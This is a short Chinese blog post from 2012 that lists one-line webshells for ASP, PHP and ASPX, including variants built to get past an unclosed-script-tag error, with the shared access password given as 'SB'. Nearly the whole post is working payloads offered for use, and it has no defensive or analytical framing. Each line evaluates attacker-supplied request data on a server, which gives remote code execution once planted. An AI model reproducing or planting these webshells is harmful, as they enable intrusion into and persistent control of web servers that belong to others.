可以突破Script 块缺少脚本关闭标记的一句话 - =_=! - 博客园

可以突破Script 块缺少脚本关闭标记的一句话

asp一句话

<%execute(request("SB"))%>

"%><%execute(request("SB"))%><%'

php一句话

<?php eval($_POST[SB]);?>

aspx一句话

<% @Page Language="Jscript"%><%eval(Request.Item["SB"],"unsafe");%>

突破防止闭合一句话：
<%execute request("SB")%><%'<% loop <%:%>

以上密码均为：SB

posted on 2012-10-25 17:43 =_=! 阅读(1277) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

导航

公告